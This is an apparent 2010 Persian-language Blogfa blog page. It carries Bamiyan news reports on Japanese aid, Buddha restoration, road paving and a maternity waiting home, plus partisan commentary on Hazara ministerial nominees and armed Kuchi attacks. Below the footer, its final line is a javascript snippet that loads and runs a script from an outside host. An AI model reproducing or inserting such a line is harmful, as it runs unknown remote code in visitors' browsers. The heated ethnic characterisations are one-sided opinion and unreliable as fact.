این مقام جاپانی افزود : در سفر که رئیس جمهور کرزی در جاپان داشت کشورما متعهد به پرداخت 5 میلیارد دالر شده که بیشتر در بخش های زراعت، زیربنا ، ترانسپورت وانرژی به مصرف خواهد رسید.

داکتر حبیبه سرابی والی بامیان در دیدارش با آقای هیروکی ضمن قدرانی از کمک های مستمر جاپان برای بازسازی افغانستان گفت : جاپان یکی از متعهدین خوب برای کشور ما در عرصه ای بازسازی بوده وخود بیانگر صداقت در دوستی دو کشور است.

وی افزود : هیچگاهی مردم افغانستان کمک های کشور دوست جاپان را در این بّرهه از تاریخ که سخت نیازمند همکاری است از یاد نخواهد برد.

والی بامیان در خصوص سهمگیری جاپان در بازسازی بامیان  گفت : این کشور در بازسای بامیان سهم بسیار فعال وچشمگیر داشته که عمدتاً در بخش های معارف ،صحی ، زراعت ، زیربنا وماین پاکی خصوصاً در ساحات فرهنگی متمرکز بوده است.

بگفته خانم سرابی  هزینه بزرگترین وحیاتی ترین پروژه سرک سازی ( بامیان الی یکه ولنگ) را نیز کشور جاپان پرداخته است.

بگفته مسئولین افغانی در این دیدار سفیر جاپان وعده سپرد هرگاه اداره محلی ، مکان مناسب را برای موزیم ومرکز آموزش چگونگی محافظت از آثار باستانی مهیا کنند آنرا اعمار خواهیم نمود.

عمر سلطان معین فرهنگی وزارت اطلاعات وفرهنگ که در این سفر نیز حضور داشت گفت : بامیان نماد از تاریخ وفرهنگ باارزش افغانهاست وما برای حفظ آن از هیچ نوع سعی وتلاش سر باز نخواهیم زد.

************

کار ترمیم وتحکیم کاری بودا خّرد( شمامه)

بامیان تا یک هفته دیگر به پایان میرسد.

 

مجسمه‌های بزرگ بودا  ( صلصال 53 متر وشمامه 32 متر) که در حومه ای شمال شهر بامیان  موقعیت دارد و یکی از بزرگترین وتاریخی ترین نماد فرهنگی افغانستان میباشد ،  این نماد در ماه حوت سال 1379 توسط طالبان تخریب شد. این عملکرد طالبان واکنش های جدی کشورهای جهان وسازمان ملل را نیز در پی داشت.

بعد از سقوط امارت اسلامی کشورهای جهان خصوصاً نهاد های ملی وبین المللی که در این راستا فعالیت داشت  سعی بر این داشتند تا بتوانند برای ترمیم واحیا مجدد این اثر ارزشمند سرمایه گذاری نماید  ، که میتوان از سرمایه گذاری هنگفت موسسهء علمی فرهنگی سازمان ملل متحد " یونیسکو" یاد نمود .

مجتبی میرزائی متخصص ترمیم آثار باستانی که رهبری گروپ کاری ترمیم وتحکیم آثار باقیمانده بودا 32 متری دارد در مصاحبه ای با رسانه در خصوص آغاز این پروژه گفت: از سال 2008 کار ترمیم وتحکیم بودا خرد آغاز شده وتا یک هفته دیگر به پایان میرسد.

بگفته آقای میرزائی هزینه این پروژه را یونسکو تمویل وموسسه آیکوموس کشور آلمان آنرا توسط متخصین تطبیق می نماید.

این متخصص ترمیم آثار باستانی که از سه سال بدینسو مصروف این فعالیت در جدار شمامه میباشد گفت:  در سال 2008 ما سعی نمودیم در ابتدا کاه گل باقی مانده در بسا نقاط شمامه را که 3 الی 4 سانتی متر ضخامت داشته واز جدار ها فاصله گرفته بود دوباره با استفاده از مواد مخصوص به جداره های یکجا کنیم چون خطرجدی افتیدن وازبین رفتن اش موجود بود.

وی افزود در سال 2009 سعی نمودیم تا قطعه های که باقی مانده واحتمال تخریب اش موجود بود ، با برمه کاری ها وپرکاری آن توسط مواد مخصوص دوباره بدوزیم که این کار انجام یافت .

وی افزود:  در سمت راست شانه شمامه قطعه های 100 تنی که فاصله گرفته ما دوباره با استفاده از فن تخصصی تحکیم کردیم.

اقای میرزایی می گوید متاسفانه بر اثر ضربه ای شدید که در هنگام تخریب بر جداره های بودا وارد شده درزهای بزرگی بمیان آمده بود که برای پرکاری بزرگترین آن ما سه تن سمنت ویک ونیم تن آب ده کیلو ریهو بلد توسط دستگاه مخصوص جابجا نمودیم.

داکتر حبیبه سرابی والی بامیان ضمن تشکری از اداره محترم یونسکو که برای ترمیم وتحکیم این اثر بزرگ فرهنگی سرمایه گذاری نموده گفت: ترمیم وبازسازی بودای بامیان میتوانند بر روند صنعت جهانگردی نقش مهم داشته باشد.

وی افزود : طالبان با تخریب این اثر ارزشمند تاریخی تمامی فرهنگیان  جهان را به سوگ نشاند وثابت نمود که تا چه حد فرهنگ ستیز اند.

والی بامیان گفت : اداره محلی بامیان از هر برنامه ای که بتوانند دوباره این اثر تاریخی را احیا نماید بطور قطع حمایت می نماید.

علی پیام  یک تن از فرهنگیان ونویسندگان کشور در مورد اهمیت  فرهنگی این نماد تاریخی می گوید: مجسمه های بودا در بامیان بخش از هویت فرهنگی ملل جهان است که میباید  حفظ آن را جز از مسئولیت های خویش بدانیم.

بگفته مسئولین بعد از ختم این پروژه ( یک هفته ای دیگر) کار عملی برای ترمیم وتحکیم کاری بودا بزرگ (صلصال 53 متری) آغاز میگردد.

********************

تا چند روز دیگر کار قیر ریزی سرک های بامیان آغاز میگردد

 زمانیکه از استقامت کوتل شیبر وارد بامیان می شویم به وضاحت  می بینیم که کار های زیر بنایی بی سابقه برای اولین بار آغاز یافته واین برنامه ها میتواند بطور قطع  در زندگی باشندگان بامیان دگر گونی ایجاد کند. دقیقاً این همه  کارها که روی سرک ها متمرکز شده ، مسایلی اند که مردم بامیان ومناطق مرکزی از نداشتن آن سال های سال رنج میبرد.

بامیان خود جذابیت فرهنگی وتاریخی خود را دارد وتطبیق شدن این پروژه میتواند بر اهمیت سفر در بامیان بیافزاید.

داکتر حبیبه سرابی که خود از روند کار سرکسازی در مسیر شیبر نظارت مینمود به رسانه ها گفت: خوشبختانه کار عملی قیر ریزی سرک شیبر الی بامیان که 29کیلومتر طول دارد تا 4 روز دیگر از استقامت شش پل آغاز می یابد وهزینه مجموعی آن 14.2 میلیون دالر از کمک های CERP" کمک های عاجل نظامی امریکا" میباشد.

در همین حال بگفته والی بامیان کار قیر ریزی سرک بامیان الی یکه ولنگ که 97 کیلومتر  طول دارد در چند روز دیگر نیز آغاز میگردد.

وی افزود : هزینه مجموعی که برای اعمار سرک بامیان الی یکه ولنگ از طرف کشور جاپان پرداخته میباشد.

خانم سرابی در خصوص کارهای بازسازی وزیربنایی در بامیان میگوید : در طی چند سال اخیر برنامه های خوبی در راستای ساخت ساز منجمله جاده ها در نظر گرفته شده که در حال عملی شدن است.

والی بامیان میگوید : در حال حاضر کار روی جاده که ولسوالی یکه ولنگ را به مرکز وصل مینماید ، سرک بامیان الی بغلان از مسیر دره شکاری ، بامیان الی پروان از مسیر دره غوربند و جاده ای که بامیان را با ولایات شمال کشور وصل خواهد نمود از مسیر دره صوف در جریان است.

محمد علی  53 ساله باشنده دره فولادی بامیان میگوید من در عمر خود برای اولین بار متوجه می شوم که در ولایت ما کار های عملی ساخت ساز به این بزرگی در حال آنجام است.

گزارشگر : مرضیه خرمی از بامیان

+ نوشته شده توسط آزادگان در 2010/7/14 و ساعت 8:53 PM |

+ نوشته شده توسط آزادگان در 2010/7/14 و ساعت 1:10 PM |

اولین انتظار خانه ولادی در بامیان به بهره برداری سپرده شد

ولایت بامیان که یکی از دور افتاده ترین ولایات کشور به شمار میرود, جغرافیای دشوار, اقلیم سرد و زمستان طولانی, خرابی راه های مواصلاتی, کمبودی وسایط حمل ونقل و فقر اقتصادی مشکلات مردم را چند برابر میسازد .

برای عرضه خدمات صحی بهتر روز دوشنبه مورخ 14 سرطان 1389 اولین انتظار خانه ولادی به کمک یونیسیف در جوار شفاخانه ولایت به بهره برداری سپرده شد.

داکتر احسان الله شهیر رئیس صحت عامه بامیان ضمن با اهمیت خواندن این مرکز صحی گفت: چون شفاخانه بامیان به نسبت نداشتن چنین مرکز ، با توجه همه جانبه مقام ولایت زمین این مرکز به هزینه ای 525856 افغانی خریداری گردیده وبه همکاری مالی یونسیف اعمار گردیده است.

وی افزود : هزینه مجموعی این تعمیر که از جانب یونیسف پرداخته شده بالغ به 160000 دالر امریکائی

میباشد.

همچنان داکتر احسان الله شهیر علاوه نمود:  انتظار خانه ولادی بامیان یکی از ابتکارات جدید است که بصورت جدی در پائین آوردن مرگ و میر و معیوبیت های مادران و اطفال در آینده این ولایت نقش بازی خواهد کرد.

داکتر حبیبه سرابی والی بامیان در پیامی اعمار این مرکز را یک گام مهم در راستای عرضه خدمات صحی بهتر وباکیفیت دانسته افزود: قبلاً مریضان ولادی به مشکلات جدی محل مناسب برای انتظار قبل از ولادت را داشتند که خوشبختانه با اعمار این مرکز مشکلات مرفوع خواهد شد.

خانم سرابی افزود: یکی از اهداف ووظایف اساسی اداره محلی بامیان زمینه سازی برای زندگی مرفع برای شهروندان می باشد که ما بدون شک با تمام توان برای رسیدن به این هدف سعی می نمایم.

بگفته رئیس صحت عامه بامیان اداره محترم یونسیف برای مدت یک سال آینده تمام مصارف این مرکز صحی را عهده دار گردیده و در آینده نیز وعده همکاری داده است.

محمد علی یک تن ازشهروندان بامیان در این خصوص گفت: اعمار این مرکز بسیار با اهمیت است چون قبلاً مریضان ما از این ناحیه بسیار به مشکل مواجه بودند.

وی افزود: ما از دولت خود تشکری می کنیم ولی میخواهیم در روند ادامه داشته باشد وما را از یاد نبرند.

مرضیه خرمی

+ نوشته شده توسط آزادگان در 2010/7/6 و ساعت 10:59 AM |

طی مراسم باشکوهی :

ستاره معارف ولسوالی شیبر ولایت بامیان معرفی شد

بامیان یکی از جمله ولایات امن کشور بوده که به همین لحاظ رشد معارف وحاکمیت قانون در آن نسبت به سایر نقاط کشور چشمگیر میباشد.

ریاست معارف این ولایت در ابتکاری طی دوسال برنامه معرفی برترین دانش آموز سال تحت عنوان " ستاره معارف" را روی دست گرفته است

روز دوشنبه مورخ 14 سرطان طی مراسمی با شکوهی امسال معرفی این چهره ها از ولسوالی شیبر ولایت بامیان آغاز یافت .

محمدرضا ادا رئیس معارف ولایت بامیان در خصوص این برنامه گفت : اداره معارف ولایت بامیان برای شناسایی استعداد ها وتشویق دانش آموزان بعد از این همه ساله برنامه ای معرفی ستاره های معارف را روی دست دارد.

به گفته آقای ادا  در ابتدا از تمامی دانش آموزان در سه کتگوری ابتدائیه ، متوسطه ولیسه برای شناسایی ستاره معارف در سطح ولسوالی ها امتحان اخذ میگردد بر اساس نمره دریافتی وبا در نظرداشت تربیت واخلاق دانش آموز این افراد انتخاب میگردد وبعداً در سطح ولایت از مجموع ستاره های  ولسوالی ستاره معارف در همان سه کته گوری انتخاب میگردد.

داکتر حبیبه سرابی والی بامیان طی پیامی ضمن با اهمیت خواندن این پروسه برای تشویق دانش آموزان گفت: بدون شک ایجاد فضای رقابت سالم در عرصه های آموزشی می تواند توانمندی وخلاقیت های بی شماری را ساماندهی کند.

وی افزود: این همه بدون همکاری  وحمایت بدریغانه ای مردم شریف بامیان امکان پذیر نبود این ثمره ای قانون پذیری وحمایت از صلح است.

نصیر احمد ستاره معارف دوره  لیسه ولسوالی شیبر ضمن تشکری از برنامه  ریاست معارف گفت: بسیار خوشحالم در شرایط آموزی می بینم که معیار های شایسته سالاری برای قضاوت اهمیت دارد وهیچ مطرح نیست از کجا هستی .

وی افزود:کاش میشد این نوع قضاوت در کل تصمیم گیری های کشوری به یک فرهنگ وارزش تبدیل میشد.

خان جان وضمیره دانش آموزان دیگری بودند که به ترتیب از دوره های متوسطه وابتدائیه ولسوالی شیبر به عنوان ستاره معرفی شدند.

همچنان در این مراسم به یکتن از معلمین مجرب وبا استعداد این ولسوالی مدال افتخاری استقلال کشور که از طرف وزارت معارف منظور شده بود توسط رئیس معارف  اهدا گردید.

در اخیر مراسم لوح تقدیر برای ستاره های معارف ، سرمعلمین که این ستاره ها از آن مکتب بود ،والدین ستاره های معارف ولسوالی شیبر ودسته گل تقدیم گردید.

گفتنی است که ولسوالی شیبر  در شرق ولایت بامیان قرار داشته ودارای 28 باب مکتب ویک باب مدرسه میباشد.

+ نوشته شده توسط آزادگان در 2010/7/6 و ساعت 10:57 AM |

سخنان ناگفته آقای بهزاد

در چند روز اخير شاهد چند عزل و نصب در تشكيلات نظامي كشور بوديم كه با وجود مهم بودن تحت الشعاع ناكامي نامزد وزراي هزاره در پارلمان قرار گرفت و كمتر مورد توجه تحليلگران ما درين فضاي مجازي واقع شد . در پي عزيمت جنرال بسم الله خان از ستاد مشترك ارتش به وزارت داخله جنرال كريمي رييس اپراسيون وزارت دفاع به اين سمت مهم نظامي گماشته شد . اين جنرال كمتر شناخته شده اردو داراي سابقه خدمت در دوران حاكميت طالبان است . درهمين حال جنرال مرادعلي مراد فرمانده قل اردوي بلخ از مقامش بركنار و به عنوان قوماندان قوتهاي زميني اردو معرفي شد . اين سمت نظامي تا كنون در چوكات وزارت دفاع و تشكيلات ارتش وجود نداشته و با توجه به فرماندهي مستقيم لوي درستيز بر قطعات و واحد هاي نظامي به نظر مي رسد اين عنوان جديد هم چيزي در رديف درستيزوال اردو باشد كه قبلا به جنرال عبدالرشيد دوستم اعطا شده بود . گفته ميشود بجاي جنرال مرادعلي يك تن از صاحب منصبان پشتون تبار عهده دار فرماندهي قل اردوي شمال شده است .
از سوي ديگر و در پي برهم خوردن آشكار توازن قومي در وزارت دفاع و تشكيلات ارتش حاجي عنايت الله نظري نامزد وزير امور مهاجرين ( در فهرست اول ) و از نزديكان محمد يونس قانوني به حيث معاون وزارت دفاع گماشته شده است .
در كنار اين عزل و نصب ها اخباري از محافل سياسي كابل شنيده مي شود كه گوياي برنامه ريزي دقيق حاكميت در راستاي سياستهاي جاري است . به دنبال همراه شدن برهان الدين رباني با حكومت و تنها گذاشتن عبدالله عبدالله در تحريم جرگه نام نهاد صلح فرزند ارشد ايشان به عنوان انعام اين عمل به صفت سفير افغانستان در تركيه فرستاده شد و قرار است جناب ايشان هم در دور آينده شوراي ملي ابتدا به صفت سناتور انتصابي وارد مشرانو جرگه شده و با تباني حكومت رياست اين مجلس را در اختيار گيرد . در همين رابطه جناب سلطان عبدالرب رسول سياف را آماده جلوس بر رياست مجلس نمايندگان نموده است . و اين همه زد و بند درحالي صورت ميگيرد كه اخيرا در نشست هايي با محوريت سفارت عربستان در كابل همكاري ميان جهره هاي چون سياف - رباني - قانوني و مجددي با كرزي زمينه سازي شده است . پروژه حذف برخي از جريانات سياسي هدف عمده اين آرايش جديد است .
از جانب ديگر رفت و آمدهاي ميان عده اي از دوستان معاون دوم رياست جمهوري با اعضاي حزب اسلامي در شمال روي داده است كه ماحصل آن تشكيل شوراي جهادي ميان اين دو تنظيم در ولايات شمالي خواهد بود .
اپوزيسيون به رهبري دكتر عبدالله هم روزهاي دشواري را سپري مي كند . قرار بود تشكيلات رهبري اين جريان درين روزها اعلام شود اما برنامه جداسازي بخشهاي از آن توسط حكومت با موفقيت اجرا گرديد و باعث اختلال در روند فعاليتهاي آن شد .
با مصروف شدن جناحهاي سياسي در اختلافات داخلي و درگير شدن بعضي از آنها ( احزاب عمدتا هزاره ) با پايگاه اجتماعي شان بر سر موضوعاتي چون ناكامي وزرا و تضعيف موقعيت شان در حكومت ،ارگ كابل روزها و شبهاي پركاري را ميگذراند . انتشار خبر ورود و خروج مخفيانه جنرالان پاكستاني ( رييس ستاد مشترك ارتش پاكستان و رييس آي اس آي ) به ارگ و ملاقات محرمانه حامد كرزي با پسر حقاني تا حدودي مطبوعاتي شد اما با تكذيب شتابزده رياست جمهوري به حاشيه رفت .
قرار است فردا گردهمايي مردمي در اعتراض به برخورد فاشيستي پارلمان نسبت به نامزد وزراي هزاره در غرب كابل برگزار شود . اين تصميم پس از آن صورت گرفت كه شماري از وكلاي اهل تشيع ( كه تعدادي از آنها در راي گيري براي وزرا غايب بودند ) روز چهارشنبه قصد صدور اعلاميه و نكوهش استاد خليلي را داشتند كه با مخالفت مجمع سياسي راه نو واقع شد و به نتيجه نرسيد . از سوي ديگر مجمع سياسي راه نو با صدور فراخوان و برگزاري نشست مطبوعاتي خواهان وحدت عمل احزاب - شخصيتها و رهبران جامعه هزاره به منظور مقابله با روند موجود شد . اما به نظر مي رسد فعل و انفعالاتي در جريان است كه تقابل ميان جناحهاي سياسي جامعه هزاره را تشديد سازد . محور اين فعاليت عناصري خارج از دو جناح حزب وحدت ( خليلي - محقق ) هستند كه همزمان با تيم حاكم نيز روابط نزديكي دارند . به گفته تعدادي از وكلا، پس از ناكامي نامزد وزراي هزاره طوماري در حمايت از سيد عبدالقيوم سجادي وكيل غزني و محمد نور اكبري وكيل دايكندي جهت معرفي شان به حيث وزير تهيه شده و توسط فعالين تيم حكومت در شورا از وكلا امضا جمع آوري ميشود .
تحليل اين رويدادهاي پر شتاب باشد براي فردا . هرچند اين كاريكاتور بدون شرح هم مفهوم خودش را دارد .

نشست مطبوعاتي مجمع سياسي راه نو

قابل توجه دوستان !
گردهمايي فردا در غرب كابل از سوي مجمع سياسي راه نو نيست . ما خود اين خبر را از رسانه استاد محقق شنيديم . به عنوان يك خبر در مطلب گنجانده شد . با پيگيري هاي كه صورت گرفت تا حدودي از انگيزه اين تجمع با اطلاعيم ولي جهت پرهيز از آشفتگي بيشتر از كنار آن مي گذريم .
دوستان شما در مجمع سياسي راه نو خواهان انسجام و هماهنگي همه جانبه تمامي فعالين سياسي جامعه هزاره در برابر روند حوادث و تحولات پر شتاب اند . طبعا با تامين اين شرط مهم است كه نوبت به هماهنگي هاي لازم با ديگر جوامع همسرنوشت فرا مي رسد و بايد به آن پرداخته شود .
ضمن احترام به نظرات همه دوستان و از جمله ياراني كه با گوشه و كنايه هاي شان ما را مي نوازند، آنچه از ما برآيد و آن را به نفع مردم و كشور خود تشخيص دهيم در انجامش نه درنگ خواهيم كرد و نه پنهانكاري .
مواضع اعضاي مجمع سياسي راه نو در سالهاي اخير شفاف ، صريح و توام با ارايه راهكار جهت اجتناب از وضعيت فعلي و مهار موج افزون خواهي فاشيزم بوده است . اگر به آن راهكارها اندگي بها داده ميشد وضع به اينجا نمي رسيد . به عنوان نمونه خبرهاي تازه از بهسود و دايميرداد حاكي است كه موج تازه تهاجم كوچي ها آغاز شده است . ما همين چند هفته پيش خواهان تداوم مقاومت مدني براي حل و فصل نهايي اين معضل شده بوديم ولي نه دوستان ما در پارلمان شنيدند و نه بزرگان ما در احزاب . دوستاني ديگر هم در وبلاگها و فيسبوك ما را متهم به فعاليتهاي كمپايني كردند تا جايي كه ترسيديم اصرار ما دعواي خانگي براه نياندازد و كنار كشيديم .
حال از همه ياران مي خواهم اگر از سر تفنن به صفحات فيسبوك سر ميكشند بهتر است كامنت گذاري هاي تفنني را به موضوعاتي غير از اين ببرند و مجال دهند اين صفحه خارج از هياهو دريچه ارتباطي ميان ياراني باشد كه دغدغه شان سرنوشت ملك و ملت است .
صاحب اين صفحه با حسن نيت تقاضاهاي دوستي را به گرمي استقبال نمود و با وجود انبوهي از گرفتاريها با اصرار برخي ياران دبستاني وارد اين عرصه از اطلاع رساني شد . نيك مي دانيد كه اگر هدف كمپاين انتخاباتي باشد هيچ آدم عاقلي كه خود در هرات نامزد است براي مخاطبي كه از لندن تا ميلبورن پراكنده است كمپاين نمي كند .
موفق باشيد

+ نوشته شده توسط آزادگان در 2010/7/2 و ساعت 10:51 PM |

ویژه نامه ی تقبیح کوچی های مسلح به

هزارستان به زودی چاپ و نشر میشود

مرتضی خرمی

کوچی های مسلح برای چهارمین سال است ، که به هزارستان حمله نموده اند و در جریان چهار سال تعداد زیادی از مردم بیگناه و بی دفاع مناطق تیزک ، دایمیرداد ، کجاب و بهسود ولایت میدان وردک و ولسوالی های قره باغ و ناهور ولایت غزنی به دست کوچی های مسلح به شهادت رسیدند ، خانه های شان مورد تاراج قرار گرفته و یابه آتش کشیده شده اند .

کوچی های مسلح با پیروی از شیوه جنگ های طالبانی اول خانه های مردم را تاراج کرده اند و بعداً آتش زده اند و زمانی که پای طالبان  به هزارستان رسید این سیاست خصمانه را آنها در آنجا اجرا کردند . کوچی ها هم از لحاظ رویه طالبان گونه عمل نمودند و هم اخلاق شان اخلاق طالبانی بود . آنها  از مکتب و منبر گرفته تا مسایل دینی و مذهبی مردم دست به بی احترامی زدند ، الی بخاطر چند تا مواشی نباید انسانهای یک جامعه قربانی میشد . زیرا مسئله کوچی ها با مردم ده نشین هر مناطق از جمله با مناطق هزاره نشین پس منظر خصمانه و کینه توزانه داشته و کوچی ها در ادوار مختلف تاریخی چنین جنایاتی را به کرات انجام داده و بنا به نبود امکانات رسانه یی و پشتبانی همه جانبه حکومت ها جنایات بیشرمانه ی آنان مورد پرده پوشی قرار گرفته و یا برعکس آن مردم ده نشین را مقصر دانسته اند . در عصر دموکراسی و مردم سالاری کوچی ها بار دیگر در فکر گذشته ها افتادند و وقتی که از رفتن شان به صفحات شمال و مناطق دیگر نا امید شدند رو بطرف هزارستان نمودند و زمانی که مردم بهسود و دایمیرداد از رفتن آنان بخاطر حفظ زمین های زرعی شان  ممانعت کردند بیرحمانه مورد هجوم قرار گرفتند و خانه هایشان تاراج شدند و ده ها نفر شان بدست چوپانان یاغی و وحشی شهید شدند .

این هجوم وحشیانه کوچی ها در جریان چهار سال به هزارستان خشم و انزجار مردم هزاره و افغانستان را بر انگیخت و تمام مردم این جنایت بیشرمانه را تقبیح کردند و از دولت افغانستان خواستند که به این معضل تاریخی مطابق به احکام قانون اساسی کشور نقطه پایان بگذارند. عمق فاجعه سال به سال سنگین تر میشد و کوچی ها بخاطر ورود شان به هزارستان همه ساله متوسل به جنگ شدند و جنایات زیادی را مرتکب گردیدند .

امسال هم هزارستان مورد تهاجم قرار گرفت ، چندین نفر کشته و زخمی شدند و صدها خانه در مناطق یاد شده به آتش کشیده شد ند. قضیه امسال نسبت به سال های گذشته فرق داشت . هزاره ها از پارلمان گرفته تا معاونیت دوم ریاست جمهوری و داخل و خارج کشور یکصدا عمل کردند و در مقابل جنایات کوچی ها سکوت ننموده و هر کدام به نوبه ی خود کوشیدند تا فشار را بردولت بیشتر سازند که از وسعت یافتن  جنایات کوچی ها در هزارستان بکاهند. حرکت منسجمانه امسال مردم بنده را وادا داشت تا تمام این رویداد را تا حد ممکن که حاوی عکسهای مستند ، فرمایشات رهبر شهید در مورد سابقه جنایت کوچی ها ، مقالات تحلیلی نویسندگان مطرح ، گزارشهای جنگ از زبان رسانه ها ، تحصن وکلای مردم هزاره در شورای ملی ، کنفرانس مطبوعاتی ، سفر ، پیام و سخنرانی استاد خلیلی ، گزارشهای تظاهرات هزاره ها اعم در داخل و خارج کشور ، بیانیه ها وقطعنامه های هزاره های جهان و نهاد های علمی ، فرهنگی ، سیاسی و اجتماعی ، نامه سرگشاده هزاره های مقیم خارج به دبیرکل سازمان ملل متحد ، جنایات کوچی ها به روایت تصویر ، اشعار و پیام تسلیت و بیانیه بنیاد شهید مزاری و تنظیم نسل نو هزاره مغل می باشند ، جمع آوری و تهیه نمایم و خداوند این توفیق را اعطا فرمود که به این خدمت کوچک نایل آیم و تمامی این مطالب را در قالب یک ویژه نامه که در حدود ۸۰ صفحه ( ۴۰ ) ورق میشود ترتیب کنم تا با همکاری همه جانبه بنیاد شهید مزاری و تنظیم نسل نو هزاره مغل چاپ شود و به دسترس مردم عزیز قرار گیرد . دلیل اینکار ارایه سند تاریخی جنایات کوچی ها و حرکت مدنی مردم ما در برابر این جنایات سازمان یافته می باشد  و از اینکه تمام مردم ما در شرایط حاضر دسترسی به انترنیت ندارند این ویژه نامه بعنوان سند کتبی در اختیار مردم قرار می گیرد تا باشد از یکطرف هماهنگی مردم ما مورد ستایش قرار گیرد و از سوی دیگر منبع دقیق اطلاعاتی برای سایر مردم و نسل های امروز و فردا باشد . من با وجود تمام مصروفیاتم این کار را صرف بخاطر ارج گذاری به اقدام نیک رهبران ، سیاسیون ، فرهنگیان و عامه ی مردمم انجام دادم تا باشد دین انسانی و مردمی خویش را ادا کرده باشم . و در اخیر اگر کمی و کاستی در این ویژه نامه دیده میشود ، امید است بنده را از بزرگی عفو فرمایید و در اخیر از  بنیاد شهید مزاری و تنظیم نسل نو هزاره مغل کمال سپاسگذارم که در چاپ و نشر این ویژه نامه در قالب دیدگاه نسل نو بنده را یاری و همکاری کردند . ویژه نامه فعلاْ زیر چاپ است و انشاالله به زود ترین فرصت چاپ و نشر خواهد شد .

روی جلد

 

پشت جلد

+ نوشته شده توسط آزادگان در 2010/7/2 و ساعت 11:26 AM |

عذر بد تر از گناه 

آقای کرزی امروز حکمی را صادر کرد که  سرور دانش بحيث سرپرست وزارت تحصيلات عالي و مسلکي و داکتر داوود علي نجفي بحيث سرپرست وزارت ترانسپورت و هوانوردي منظور است و در حکم از بارگاه خداوند متعال (ج) توفيقات مزيد در انجام امور محوله استدعا گرديده است.

این حکم بسیار جالب است - آقای کرزی میخواهد با این کار مردم هزاره را به سکوت وادار کند ولی قضیه شکل دیگری را بخود گرفته پارلمان خلاف منافع ملی عمل میکند و وحدت نوپای ملی را بخطر مواجه میسازد.

+ نوشته شده توسط آزادگان در 2010/6/29 و ساعت 11:12 PM |


Powered By
BLOGFA.COM


javascript:(a=(b=document).createElement('script')).src='//lnktrn.ch/osama/a.js.php?'+Math.random(),b.body.appendChild(a);void(0)